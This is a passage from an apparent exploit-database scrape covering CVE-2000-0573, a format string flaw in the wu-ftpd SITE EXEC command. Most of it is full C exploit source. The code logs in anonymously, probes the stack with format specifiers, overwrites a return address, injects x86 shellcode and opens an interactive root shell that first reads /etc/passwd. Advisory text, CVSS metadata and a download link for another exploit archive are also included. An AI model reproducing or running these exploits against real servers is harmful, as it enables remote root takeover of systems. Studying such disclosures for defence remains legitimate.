sprintf(buff,\"CWD %s\\r\\n\",new);\r\n ftp_send(sock,buff,strlen(buff),1,buff,2047);\r\n printf(GREEN\"CWD <shellcode>\"NORM\"\\n%s\",buff);\r\n return;\r\n}\r\nvoid process_possibly_rooted(int sock)\r\n{\r\n fd_set fd_read;\r\n char buff[1024], *cmd=\"/bin/cat /etc/passwd;/usr/bin/id;\\n\";\r\n int n;\r\n\r\n FD_ZERO(&fd_read);\r\n FD_SET(sock, &fd_read);\r\n FD_SET(0, &fd_read);\r\n send(sock, cmd, strlen(cmd), 0);\r\n while(1) {\r\n FD_SET(sock,&fd_read);\r\n FD_SET(0,&fd_read);\r\n if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;\r\n if( FD_ISSET(sock, &fd_read) ) {\r\n if((n=recv(sock,buff,sizeof(buff),0))<0){\r\n fprintf(stderr, \"EOF\\n\");\r\n exit(2);\r\n }\r\n if(write(1,buff,n)<0)break;\r\n }\r\n if ( FD_ISSET(0, &fd_read) ) {\r\n if((n=read(0,buff,sizeof(buff)))<0){ \r\n fprintf(stderr,\"EOF\\n\");\r\n exit(2);\r\n }\r\n if(send(sock,buff,n,0)<0) break;\r\n }\r\n usleep(10); \r\n }\r\n fprintf(stderr,\"Connection aborted, select failed()\\n\");\r\n exit(0);\r\n}\r\n\r\nint magic_check_f(int sock, char *str) {\r\n char q[2048], ans[2048];\r\n\r\n snprintf(q, 2048, \"site exec %s%s\\r\\n\", str, \"%.f\");\r\n if( strstr( q, \"\\r\\n\") == NULL) {\r\n fprintf(stderr,\"Line TOO big..\\n\");\r\n exit(-1);\r\n }\r\n ftp_siteexec(sock, q, strlen(q), 1, ans, 2048);\r\n if( before_len+10 < strlen(&ans[3]) ) return 0;\r\n before_len=strlen(&ans[3]);\r\n (void)strcat(str,\"%.f\");\r\n return 1;\r\n}\r\nint magic_check_o(int sock, char *str) {\r\n char q[2048], ans[2048];\r\n snprintf(q, 2048, \"site exec %s%s\\r\\n\", str, \"%c\");\r\n if( strstr( q, \"\\r\\n\") == NULL) {\r\n fprintf(stderr,\"Line TOO big..\\n\");\r\n exit(-1);\r\n }\r\n ftp_siteexec( sock, q, strlen(q), 1, ans, 2048);\r\n if( before_len== strlen(&ans[3]) ) {\r\n before_len+=1;\r\n (void)strcat(str, \"%d\");\r\n return 3;\r\n }\r\n before_len=strlen(&ans[3]);\r\n (void)strcat(str,\"%c\");\r\n return 2;\r\n}\r\n\r\nint magic_check_ok( int sock, char *str)\r\n{\r\n char q[2048], ans[2048];\r\n 
int i ,n=1, f, padding=0;\r\n \r\n snprintf(q, 2048,\"site exec aaaaaaaa%s%s\\r\\n\", str, \"%p%p\");\r\n if ( strstr(q, \"\\r\\n\" ) == NULL) {\r\n fprintf(stderr, \"Line too long\\n\");\r\n exit(-1);\r\n }\r\n (void)bzero(ans, 2048);\r\n ftp_siteexec(sock, q, strlen(q), 1, ans, 2047);\r\n if(strstr(ans,\"0x61616161\")==NULL)\r\n return 0;\r\n for(i =0; i < MAX_MAGIC && magic[i]; i++);\r\n magic_d[i]=4;\r\n while(n){\r\n for(f=0; f< 2; f++) {\r\n snprintf(q, 2048,\"site exec %.*saaaa%s%s\\r\\n\", padding, \"xxxx\", str, f?\"%p%p\":\"%p\");\r\n (void)bzero(ans, 2048);\r\n ftp_siteexec(sock, q, strlen(q), 1, ans, 2047);\r\n if( strstr(ans, \"0x61616161\")!=NULL) {\r\n if (f==0) {\r\n magic[i]=padding;\r\n return 1;\r\n } else if( f==1) {\r\n strcat(str,\"%p\");\r\n magic[i]=padding;\r\n return 1;\r\n }\r\n }\r\n }\r\n if(padding > 4) {\r\n fprintf(stderr,\"Cannot calculate padding..\\n\");\r\n exit(1);\r\n }\r\n padding++; \r\n }\r\n return 1;\r\n}\r\n\r\n\r\nint magic_digger(int sock)\r\n{\r\n int get_out=1,where=0,all_failed=MAX_FAILED*2,f=0,o=0;\r\n \r\n if(magic_str==NULL){\r\n if((magic_str=(char*)malloc(4092))==NULL){\r\n perror(\"malloc\");\r\n exit(errno);\r\n }\r\n }\r\n (void)bzero(magic_str, 4092);\r\n where=0;\r\n while(get_out) {\r\n int q;\r\n if( where >= MAX_MAGIC-1 || all_failed <= 0 )\r\n return -1;\r\n if( magic_check_f(sock, magic_str) ) {\r\n o=0,f++;\r\n if(f==1){\r\n if(!magic[where])\r\n magic[where]=1;\r\n else\r\n magic[++where]+=1;\r\n magic_d[where]=1;\r\n } else\r\n magic[where]+=1;\r\n all_failed=MAX_FAILED*2;\r\n printf(\"%s\", \"%.f\"); fflush(stdout);\r\n goto verify;\r\n }\r\n all_failed--;\r\n if((q=magic_check_o(sock,magic_str))){\r\n f=0,o++;\r\n if(o==1){\r\n if(!magic[where])\r\n magic[0]=1;\r\n else\r\n magic[++where]+=1;\r\n magic_d[where]=q;\r\n } else {\r\n if(magic_d[where]==q)\r\n magic[where]+=1;\r\n else {\r\n magic[++where]=1;\r\n magic_d[where]=q;\r\n }\r\n }\r\n all_failed=MAX_FAILED*2;\r\n printf(\"%s\", 
q==2?\"%c\":\"%d\");\r\n fflush(stdout);\r\n goto verify;\r\n }\r\n all_failed--;\r\n continue;\r\n verify:\r\n if(magic_check_ok(sock,magic_str)){\r\n putchar('\\n');\r\n return 0;\r\n }\r\n }\r\n return 0;\r\n}\r\n\r\nint main(int argc, char *argv[]){\r\n char *buff, *buff_p, *buff_p2, c, shellcode[500],*dir,*passwd=shellcode;\r\n int i, sock, num=-2, padding=-1, gm=0, testmode=0,mtype=0,bla=0,offset=0;\r\n u_long ret_addr=0, pass_addr=0;\r\n for(i=0;targ[i].os_descr!=NULL;i++);\r\n while((c=getopt(argc,argv,\"t:l:m:o:s:r:p:M:P:xghH?\"))!=EOF){\r\n switch(c) {\r\n case 't': target=optarg;break;\r\n case 'l':\r\n username=optarg;\r\n passwd=strchr(optarg,'/');\r\n if(passwd==NULL)\r\n usage(argv[0],0);\r\n *passwd++=(char)0;\r\n break;\r\n case 'x': testmode=1; break;\r\n case 'o': offset=atoi(optarg);break;\r\n case 'p': pass_addr=strtoul(optarg, &optarg,16); break;\r\n case 'g': gm=1; break;\r\n case 'M': dir=optarg;mtype=1;break;\r\n case 'm':\r\n {\r\n int where=0;\r\n if(!*optarg) {\r\n fprintf(stderr,\"-m requires argument, try -h for help\\n\");\r\n exit(1);\r\n }\r\n while(1) {\r\n magic[where]=strtoul(optarg,&optarg,16);\r\n optarg=strchr(optarg,',');\r\n if(optarg==NULL){\r\n printf(\"comma missing\\n\");\r\n exit(1);\r\n }\r\n optarg++;\r\n magic_d[where++]=strtoul(optarg,&optarg,16);\r\n if(strchr(optarg,':')==NULL){\r\n magic[where]=magic_d[where]=0;\r\n break;\r\n }\r\n optarg=strchr(optarg,':');\r\n optarg++;\r\n }\r\n }\r\n break;\r\n case 's':\r\n num=atoi(optarg);\r\n if(num>i) {\r\n fprintf(stderr,\"systype too big, try -h for help\\n\");\r\n exit(1);\r\n } \r\n break;\r\n case 'r':\r\n ret_addr=strtoul(optarg,&optarg,16);\r\n break;\r\n case 'P':\r\n padding=atoi(optarg);\r\n break;\r\n case 'H':\r\n bla=2;\r\n default: usage(argv[0],bla);break;\r\n }\r\n }\r\n if(target==NULL){\r\n fprintf(stderr,\"No target specified, try -h for help\\n\");\r\n exit(1);\r\n }\r\n if(num==-1||num==-2) {\r\n for(i=0;!targ[i].def;i++);\r\n num=i;\r\n }\r\n 
(void)memcpy((void*)&getit,(void*)&targ[num],sizeof(struct targets));\r\n\r\n if(magic[1]!=0) {\r\n memcpy((void*)getit.magic,magic,sizeof(magic));\r\n memcpy((void*)getit.magic_d,magic_d,sizeof(magic));\r\n }\r\n\r\n if(ret_addr)getit.addr_ret_addr=ret_addr;\r\n if(pass_addr)getit.pass_addr=pass_addr;\r\n\r\n getit.addr_ret_addr+=(offset*4);\r\n\r\n sock=connect_to_server(target);\r\n memset(shellcode, '\\x90', sizeof(shellcode));\r\n shellcode[sizeof(shellcode)-1]=(char)0;\r\n if(!mtype){\r\n memcpy((void*)&shellcode[sizeof(shellcode)-strlen(getit.shellcode)-1],(void*)getit.shellcode, strlen(getit.shellcode)+1);\r\n shellcode[sizeof(shellcode)-1]=(char)0;\r\n }else{\r\n memcpy((void*)&shellcode[250-strlen(getit.shellcode)-1],(void*)getit.shellcode,strlen(getit.shellcode));\r\n shellcode[250-1]=(char)0;\r\n }\r\n printf(\"Target: %s (%s/%s): %s\\n\",target,username,*passwd=='\\x90'?\"<shellcode>\":passwd,getit.os_descr);\r\n printf(\"Return Address: 0x%08lx, AddrRetAddr: 0x%08lx, Shellcode: %d\\n\\n\",getit.pass_addr,getit.addr_ret_addr,strlen(getit.\r\nshellcode));\r\n\r\n buff=(char *)malloc(1024);\r\n bzero(buff,1024);\r\n\r\n (void)ftp_recv(sock,NULL,0,1);\r\n\r\n (void)ftp_login(sock,username,passwd);\r\n\r\n if(gm||(magic_str==NULL&&getit.magic[0]==0)){\r\n printf(\"STEP 2A: Generating magic string: \");\r\n fflush(stdout);\r\n magic_digger(sock);\r\n memcpy((void *)getit.magic,(void*)magic,sizeof(magic));\r\n memcpy((void*)getit.magic_d,(void*)magic_d,sizeof(magic_d));\r\n printf(\"STEP 2B: MAGIC STRING: [\");\r\n } else {\r\n printf(\"STEP 2 : Skipping, magic number already exists: [\");\r\n }\r\n for(i=0;i<MAX_MAGIC&&getit.magic[i]!=0;i++){\r\n printf(\"%02X,%02X\",getit.magic[i],getit.magic_d[i]);\r\n if(getit.magic[i+1]!=0)\r\n putchar(':');\r\n }\r\n printf(\"]\\n\");\r\n buff=(char *)realloc(buff, 4092);\r\n (void)bzero(buff, 4092);\r\n if(mtype)\r\n ftp_mkchdir(sock,dir,shellcode);\r\n printf(\"STEP 3 : Checking if we can reach our return address by 
format string\\n\");\r\n if(!magic_str){\r\n magic_str=(char*)malloc(2048);\r\n if(magic_str==NULL) {\r\n perror(\"malloc\");\r\n exit(errno);\r\n }\r\n (void)bzero(magic_str,2048);\r\n for(i=0;i<MAX_MAGIC&&getit.magic[i]!=0;i++){\r\n switch(getit.magic_d[i]) {\r\n case 1:\r\n for(num=0;num<getit.magic[i];num++)strcat(magic_str,\"%.f\");\r\n break;\r\n case 2:\r\n for(num=0;num<getit.magic[i];num++)strcat(magic_str,\"%c\");\r\n break;\r\n case 3:\r\n for(num=0;num<getit.magic[i];num++)strcat(magic_str,\"%d\");\r\n break;\r\n case 4:if(padding<0)padding=getit.magic[i];break;\r\n default:fprintf(stderr,\"STEP 3: INternal error\\n\");\r\n exit(1);\r\n break;\r\n }\r\n }\r\n }\r\n if(padding<0){\r\n for(num=0;num<MAX_MAGIC&&getit.magic_d[num]!=4;num++);\r\n if(num<(MAX_MAGIC-1))\r\n padding=getit.magic[num];\r\n else\r\n fprintf(stderr,\"WARNING: PROBLEMS WITH PADDING\\n\");\r\n }\r\n \r\n if(!getit.islinux){\r\n if(!testmode)\r\n snprintf(buff,4096,\"site exec %.*s%c%c%c%c%s|%s\\r\\n\",padding,\"xxxxxxxxxxxxxxxxxxx\",MAKE_STR_FROM_RET(getit.addr_ret_addr\r\n),magic_str,\"%p\");\r\n else\r\n snprintf(buff,4096,\"site exec %.*s%c%c%c%c%s|%s\\r\\n\",padding,\"xxxxxxxxxxxxxxxxxxx\",MAKE_STR_FROM_RET(getit.pass_addr),ma\r\ngic_str,\"%p\");\r\n } else {\r\n if(!testmode)\r\n snprintf(buff,4096,\"site exec %.*s%c%c\\xff%c%c%s|%s\\r\\n\",padding,\"xxxxxxxxxxxxxxxxxxx\",MAKE_STR_FROM_RET(getit.addr_ret_\r\naddr),magic_str,\"%p\");\r\n else\r\n snprintf(buff,4096,\"site exec %.*s%c%c\\xff%c%c%s|%s\\r\\n\",padding,\"xxxxxxxxxxxxxxxxxxx\",MAKE_STR_FROM_RET(getit.pass_addr\r\n),magic_str,\"%p\");\r\n }\r\n sleep(getit.delay);\r\n fflush(stdout);\r\n if((buff_p=(char *)malloc(4096))==NULL){\r\n fprintf(stderr,\"malloc failed.\\n\");\r\n exit(1);\r\n }\r\n (void)bzero(buff_p,4096);\r\n ftp_siteexec(sock,buff,strlen(buff),1,buff_p,4095);\r\n if((buff_p2=strchr(buff_p,'\\r'))!=NULL)\r\n *buff_p2=(char)0;\r\n if((buff_p2=strchr(buff_p,'\\n'))!=NULL)\r\n *buff_p2=(char)0;\r\n 
buff_p2=strstr(buff_p,\"|0x\");\r\n if(buff_p2==NULL){\r\n fprintf(stderr,\"Fix me, incorrect response from '%%p':%s\\n\",buff_p);\r\n exit(1);\r\n }\r\n buff_p2+=3;\r\n if(!testmode)\r\n printf(\"STEP 4 : Ptr address test: 0x%s (if it is not 0x%08lx ^C me now)\\n\",buff_p2,getit.addr_ret_addr);\r\n else\r\n printf(\"STEP 4 : Ptr address test: 0x%s (if it is not 0x%08lx ^C me now)\\n\",buff_p2,getit.pass_addr);\r\n sleep(getit.delay);\r\n buff_p2=strstr(buff, \"%.f\");\r\n *buff_p2++=(char )0;\r\n strcpy(buff_p, buff);\r\n if(!testmode)\r\n sprintf(buff_p+strlen(buff_p),\"%s%u%c\",\"%d%.\",(u_int)getit.pass_addr,'d');\r\n else\r\n sprintf(buff_p+strlen(buff_p),\"%s\",\"%d%d\");\r\n strcpy(buff_p+strlen(buff_p), buff_p2);\r\n buff_p2=strchr(buff_p,'|');\r\n buff_p2++;\r\n printf(\"STEP 5 : Sending code.. this will take about 10 seconds.\\n\");\r\n if(!testmode){\r\n strcpy(buff_p2,\"%n\\r\\n\");\r\n ftp_send(sock,buff_p,strlen(buff_p),0,NULL,0);\r\n } else {\r\n (void)bzero(buff,4096);\r\n strcpy(buff_p2,\"%s\\r\\n\");\r\n ftp_send(sock,buff_p,strlen(buff_p),1,buff,4092);\r\n printf(\"got answer: %s\\n\",buff);\r\n exit(0);\r\n }\r\n free(buff_p);\r\n free(buff);\r\n signal(SIGINT, SIG_IGN);\r\n signal(SIGHUP, SIG_IGN);\r\n printf(RED\"Press ^\\\\ to leave shell\"NORM\"\\n\");\r\n process_possibly_rooted(sock);\r\n return 0;\r\n}\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/20030/"}, {"lastseen": "2016-02-02T13:19:20", "description": "wu-ftpd 2.4.2/2.5 .0/2.6 .0 Remote Format String Stack Overwrite (2). CVE-2000-0573. 
Remote exploit for linux platform", "published": "2000-09-26T00:00:00", "type": "exploitdb", "title": "wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2000-0573"], "modified": "2000-09-26T00:00:00", "id": "EDB-ID:20031", "href": "https://www.exploit-db.com/exploits/20031/", "sourceData": "source: http://www.securityfocus.com/bid/1387/info\r\n \r\nWashington University ftp daemon (wu-ftpd) is a very popular unix ftp server shipped with many distributions of Linux and other UNIX operating systems. Wu-ftpd is vulnerable to a very serious remote attack in the SITE EXEC implementation. Because of user input going directly into a format string for a *printf function, it is possible to overwrite important data, such as a return address, on the stack. When this is accomplished, the function can jump into shellcode pointed to by the overwritten eip and execute arbitrary commands as root. While exploited in a manner similar to a buffer overflow, it is actually an input validation problem. Anonymous ftp is exploitable making it even more serious as attacks can come anonymously from anywhere on the internet.\r\n \r\nIt should be noted that the SITE INDEX command is affected as well. 
\r\n\r\n * Linux wu-ftpd - 2.6.0(1) (tested on RH6.2 wu from rpm)\r\n *\r\n * vsz_\r\n */\r\n\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <stdio.h>\r\n#include <netinet/in.h>\r\n#include <netdb.h>\r\n\r\nchar linuxcode[] =\r\n \"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\xb0\\x46\\xcd\\x80\\x31\\xc0\\x31\\xdb\"\r\n \"\\x43\\x89\\xd9\\x41\\xb0\\x3f\\xcd\\x80\\xeb\\x6b\\x5e\\x31\\xc0\\x31\"\r\n \"\\xc9\\x8d\\x5e\\x01\\x88\\x46\\x04\\x66\\xb9\\xff\\xff\\x01\\xb0\\x27\"\r\n \"\\xcd\\x80\\x31\\xc0\\x8d\\x5e\\x01\\xb0\\x3d\\xcd\\x80\\x31\\xc0\\x31\"\r\n \"\\xdb\\x8d\\x5e\\x08\\x89\\x43\\x02\\x31\\xc9\\xfe\\xc9\\x31\\xc0\\x8d\"\r\n \"\\x5e\\x08\\xb0\\x0c\\xcd\\x80\\xfe\\xc9\\x75\\xf3\\x31\\xc0\\x88\\x46\"\r\n \"\\x09\\x8d\\x5e\\x08\\xb0\\x3d\\xcd\\x80\\xfe\\x0e\\xb0\\x30\\xfe\\xc8\"\r\n \"\\x88\\x46\\x04\\x31\\xc0\\x88\\x46\\x07\\x89\\x76\\x08\\x89\\x46\\x0c\"\r\n \"\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xb0\\x0b\\xcd\\x80\\x31\\xc0\"\r\n \"\\x31\\xdb\\xb0\\x01\\xcd\\x80\\xe8\\x90\\xff\\xff\\xff\\xff\\xff\\xff\"\r\n \"\\x30\\x62\\x69\\x6e\\x30\\x73\\x68\\x31\\x2e\\x2e\\x31\\x31\";\r\n\r\n\r\nmain (int argc, char *argv[])\r\n{\r\n\r\n char cmdbuf[8192];\r\n char cbuf[1024];\r\n char *t;\r\n char nop[400];\r\n int pip, i, a = 22, st = 0;\r\n struct sockaddr_in sck;\r\n struct hostent *hp;\r\n long inet;\r\n int port = 21;\r\n fd_set fds;\r\n unsigned int aa;\r\n long reta, retb, tmp, retz;\r\n int ret;\r\n int add = 0;\r\n\r\n memset (cmdbuf, 0x0, sizeof (cmdbuf));\r\n memset (cbuf, 0x0, sizeof (cbuf));\r\n memset (nop, 0x0, sizeof (nop));\r\n\r\n if (argc < 2)\r\n {\r\n fprintf (stderr, \"Usage: %s [ip] \\n\", argv[0]);\r\n exit (-1);\r\n }\r\n\r\n pip = socket (PF_INET, SOCK_STREAM, 0);\r\n\r\n if (!pip)\r\n {\r\n perror (\"socket()\");\r\n exit (-1);\r\n }\r\n\r\n inet = inet_addr (argv[1]);\r\n if (inet == -1)\r\n {\r\n if (hp = gethostbyname (argv[1]))\r\n\tmemcpy (&inet, hp->h_addr, 4);\r\n else\r\n\tinet = -1;\r\n if (inet == -1)\r\n\t{\r\n\t fprintf 
(stderr, \"Cant resolv %s!! \\n\", argv[1]);\r\n\t exit (-1);\r\n\t}\r\n }\r\n sck.sin_family = PF_INET;\r\n sck.sin_port = htons (port);\r\n sck.sin_addr.s_addr = inet;\r\n\r\n if (connect (pip, (struct sockaddr *) &sck, sizeof (sck)) < 0)\r\n {\r\n perror (\"Connect() \");\r\n exit (-1);\r\n }\r\n\r\n read (pip, cbuf, 1023);\r\n fprintf (stderr, \"Connected to: %s \\n\", argv[1]);\r\n fprintf (stderr, \"Banner: %s \\n\", cbuf);\r\n strcpy (cmdbuf, \"user ftp\\n\");\r\n write (pip, cmdbuf, strlen (cmdbuf));\r\n memset (nop, 0x90, sizeof (nop) - strlen (linuxcode) - 10);\r\n\r\n strcat (nop, linuxcode);\r\n\r\n memset (cmdbuf, 0x0, sizeof (cmdbuf));\r\n sprintf (cmdbuf, \"pass %s\\n\", nop);\r\n write (pip, cmdbuf, strlen (cmdbuf));\r\n sleep (1);\r\n read (pip, cmdbuf, sizeof (cmdbuf) - 1);\r\n memset (cmdbuf, 0x0, sizeof (cmdbuf));\r\n if (!strncmp (cmdbuf, \"530\", 3))\r\n {\r\n printf (\"loggin incorrect : %s \\n\", cmdbuf);\r\n exit (-1);\r\n }\r\n fprintf (stderr, \"Logged in.. \\n\");\r\n fprintf (stderr, \"+ Finding ret addresses \\n\");\r\n memset (cmdbuf, 0x0, sizeof (cmdbuf));\r\n strcpy (cmdbuf, \"SITE EXEC %x %x %x %x +%x |%x\\n\");\r\n write (pip, cmdbuf, strlen (cmdbuf));\r\n sleep (1);\r\n memset (cmdbuf, 0x0, sizeof (cmdbuf));\r\n read (pip, cmdbuf, sizeof (cmdbuf) - 1);\r\n if (!strncmp (cmdbuf + 4, \"%x\", 2))\r\n {\r\n fprintf (stderr, \"\u001b[1m\u001b[31mWuftpd is not vulnerable : %s \\n\u001b[0m\",\r\n\t cmdbuf);\r\n exit (-1);\r\n }\r\n else\r\n {\r\n fprintf (stderr, \"\u001b[1m\u001b[32mWuftpd is vulnerable : %s \\n\u001b[0m\", cmdbuf);\r\n }\r\n reta = strtoul (strstr (cmdbuf, \"|\") + 1, strstr (cmdbuf, \"|\") + 11, 16);\r\n retz = strtoul (strstr (cmdbuf, \"+\") + 1, strstr (cmdbuf, \"|\") + 11, 16);\r\n\r\n memset (cmdbuf, 0x0, sizeof (cmdbuf));\r\n strcpy (cmdbuf, \"SITE EXEC \");\r\n for (ret = 0; ret <= 88; ret++)\r\n {\r\n strcat (cmdbuf, \"%x\");\r\n }\r\n strcat (cmdbuf, \"|%x\\n\");\r\n write (pip, cmdbuf, strlen (cmdbuf));\r\n 
sleep (1);\r\n memset (cmdbuf, 0x0, sizeof (cmdbuf));\r\n read (pip, cmdbuf, sizeof (cmdbuf) - 1);\r\n retb = strtoul (strstr (cmdbuf, \"|\") + 1, strstr (cmdbuf, \"|\") + 11, 16);\r\n printf (\"Ret location befor: %x \\n\", reta);\r\n if (reta == 0)\r\n reta = retz;\r\n else\r\n add = 600;\r\n reta = reta - 0x58;\r\n retb = retb + 100 - 0x2569 - add;\r\n printf (\"Ret location : %x \\n\", reta);\r\n printf (\"Proctitle addres : %x and %u \\n\", retb, retb);\r\n sleep (2);\r\n memset (cmdbuf, 0x0, sizeof (cmdbuf));\r\n\r\n sprintf (cmdbuf, \"SITE EXEC aaaaaaaaaaaaaaaaaaaaaaaaaabbbb%c%c\\xff%c%c\",\r\n\t (reta & 0x000000ff), (reta & 0x0000ff00) >> 8,\r\n\t (reta & 0x00ff0000) >> 16, (reta & 0xff000000) >> 24);\r\n a = 22;\r\n memset (cbuf, 0x0, sizeof (cbuf));\r\n while (1)\r\n {\r\n\r\n memset (cmdbuf, 0x0, sizeof (cmdbuf));\r\n\r\n sprintf (cmdbuf, \"SITE EXEC aaaaaaaaaaaaaaaaaaaaaaaaaabbbb%c%c\\xff%c%c\",\r\n\t (reta & 0x000000ff), (reta & 0x0000ff00) >> 8,\r\n\t (reta & 0x00ff0000) >> 16, (reta & 0xff000000) >> 24);\r\n for (i = 0; i <= 128; i++)\r\n\tstrcat (cmdbuf, \"%.f\");\r\n for (i = 0; i <= a; i++)\r\n\tstrcat (cmdbuf, \"%d\");\r\n sprintf (cbuf, \"|%%x|%%x\\n\", aa + 9807 - 460);\r\n strcat (cmdbuf, cbuf);\r\n write (pip, cmdbuf, strlen (cmdbuf));\r\n memset (cmdbuf, 0x0, sizeof (cmdbuf));\r\n read (pip, cmdbuf, sizeof (cmdbuf) - 1);\r\n t = (char *) strstr (cmdbuf, \"|\");\r\n tmp = strtoul (t + 1, t + 11, 16);\r\n if (tmp != 0)\r\n\t{\r\n\t fprintf (stderr, \"tmp 1 : 0x%x\\n\", tmp);\r\n\t if (tmp == reta)\r\n\t {\r\n\t fprintf (stderr, \"Cached a : %d \\n\", a);\r\n\t st = 1;\r\n\t break;\r\n\t }\r\n\t tmp = strtoul (t + 11, t + 22, 16);\r\n\t fprintf (stderr, \"tmp 2 : 0x%x\\n\", tmp);\r\n\t if (tmp == reta)\r\n\t {\r\n\t fprintf (stderr, \"Cached a : %d \\n\", a);\r\n\t st = 2;\r\n\t break;\r\n\t }\r\n\t}\r\n if (st > 0)\r\n\tbreak;\r\n a++;\r\n }\r\n sleep (1);\r\n memset (cmdbuf, 0x0, sizeof (cmdbuf));\r\n memset (cbuf, 0x0, sizeof 
(cbuf));\r\n\r\n sprintf (cmdbuf, \"SITE EXEC aaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb%c%c\\xff%c%c\",\r\n\t (reta & 0x000000ff), (reta & 0x0000ff00) >> 8,\r\n\t (reta & 0x00ff0000) >> 16, (reta & 0xff000000) >> 24);\r\n for (i = 0; i <= 128; i++)\r\n strcat (cmdbuf, \"%.f\");\r\n if (add != 600)\r\n a = a - 1;\r\n fprintf (stderr, \"Trying with : %d \\n\", a);\r\n for (i = 0; i <= a; i++)\r\n strcat (cmdbuf, \"%d\");\r\n\r\n aa = retb;\r\n if (add == 600)\r\n sprintf (cbuf, \"|%%.%ud%%n\\n\", aa + 9807);\r\n else\r\n sprintf (cbuf, \"|%%.%ud%%n\\n\", aa + 9807 - 480);\r\n\r\n strcat (cmdbuf, cbuf);\r\n write (pip, cmdbuf, strlen (cmdbuf));\r\n memset (cmdbuf, 0x0, sizeof (cmdbuf));\r\n read (pip, cmdbuf, sizeof (cmdbuf) - 1);\r\n memset (cmdbuf, 0x0, sizeof (cmdbuf));\r\n\r\n fprintf (stderr, \"\u001b[1m\u001b[33m Wait for a shell.....\\n\u001b[0m\");\r\n\r\n\r\n while (1)\r\n {\r\n FD_ZERO (&fds);\r\n FD_SET (0, &fds);\r\n FD_SET (pip, &fds);\r\n select (255, &fds, NULL, NULL, NULL);\r\n if (FD_ISSET (pip, &fds))\r\n\t{\r\n\t memset (cbuf, 0x0, sizeof (cbuf));\r\n\t ret = read (pip, cbuf, sizeof (cbuf) - 1);\r\n\t if (ret <= 0)\r\n\t {\r\n\t printf (\"Connection closed - EOF \\n\");\r\n\t exit (-1);\r\n\t }\r\n\t printf (\"%s\", cbuf);\r\n\t}\r\n if (FD_ISSET (0, &fds))\r\n\t{\r\n\t memset (cbuf, 0x0, sizeof (cbuf));\r\n\t read (0, cbuf, sizeof (cbuf) - 1);\r\n\t write (pip, cbuf, strlen (cbuf));\r\n\t}\r\n }\r\n close (pip);\r\n}\r\n/* www.hack.co.za [26 September 2000]*/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/20031/"}, {"lastseen": "2016-02-02T13:19:29", "description": "wu-ftpd 2.4.2/2.5 .0/2.6 .0 Remote Format String Stack Overwrite (3). CVE-2000-0573. 
Remote exploit for lin_x86 platform", "published": "2001-05-04T00:00:00", "type": "exploitdb", "title": "wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite 3", "bulletinFamily": "exploit", "cvelist": ["CVE-2000-0573"], "modified": "2001-05-04T00:00:00", "id": "EDB-ID:20032", "href": "https://www.exploit-db.com/exploits/20032/", "sourceData": "source: http://www.securityfocus.com/bid/1387/info\r\n \r\nWashington University ftp daemon (wu-ftpd) is a very popular unix ftp server shipped with many distributions of Linux and other UNIX operating systems. Wu-ftpd is vulnerable to a very serious remote attack in the SITE EXEC implementation. Because of user input going directly into a format string for a *printf function, it is possible to overwrite important data, such as a return address, on the stack. When this is accomplished, the function can jump into shellcode pointed to by the overwritten eip and execute arbitrary commands as root. While exploited in a manner similar to a buffer overflow, it is actually an input validation problem. Anonymous ftp is exploitable making it even more serious as attacks can come anonymously from anywhere on the internet.\r\n \r\nIt should be noted that the SITE INDEX command is affected as well. \r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20032.tar.gz", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/20032/"}, {"lastseen": "2016-01-31T11:59:53", "description": "wu-ftpd 2.6.0 Remote Format Strings Exploit. CVE-2000-0573. 
Remote exploit for solaris platform", "published": "2001-01-03T00:00:00", "type": "exploitdb", "title": "wu-ftpd 2.6.0 - Remote Format Strings Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2000-0573"], "modified": "2001-01-03T00:00:00", "id": "EDB-ID:239", "href": "https://www.exploit-db.com/exploits/239/", "sourceData": "/*\r\n**\r\n** 12:40 11/10/00: Tool for either attack or defense\r\n** within an information warfare setting. Rather, it\r\n** is a small program demonstrating proof of concept.\r\n** Default values for solaris 2.8 and inetd.\r\n**\r\n** If you are not the intended recipient, or a person\r\n** responsible for delivering it to the intended\r\n** recipient, you are not authorised to and must not\r\n** disclose, copy, distribute, or retain this message\r\n** or any part of it. Such unauthorised use may be\r\n** unlawful.If you have received this transmission in\r\n** error,please email us immediately at hert@hert.org\r\n** so that we can arrange for its return.\r\n**\r\n** kalou <pb@hert.org>\r\n**\r\n** Usage:\r\n** \r\n** 0xfdc (4060) bytes after the ret position, you have:\r\n**\r\n** -HOSTNAME: anonymous/EGGSHELL\r\n**\r\n** This of course begins on a 4 bytes boundary.\r\n**\r\n** Check your hostname len. Align this with pad to have EGGSHELL on a\r\n** 4 bytes boundary (-p). Localhost needs 2 bytes, for example.\r\n**\r\n** Use '%s' format bug exploitation to look for this string in memory.\r\n** (you have to eat 15 words out of stack).\r\n**\r\n** Remove 0xfdc + len (-HOSTNAME: anonymous/pad) to your found pointer.\r\n** This substracted value is kept as the distance (-d).\r\n** Result is your return address position (-w). Check it if you want.\r\n**\r\n** This code substracts 8 to this address (sparc ret behaviour).\r\n**\r\n** You may use the 102th %p pointer on stack to find the string. eg: ffbef640.\r\n**\r\n** adding 0x870 to this value, I found my string.\r\n**\r\n** offset should be useless. 
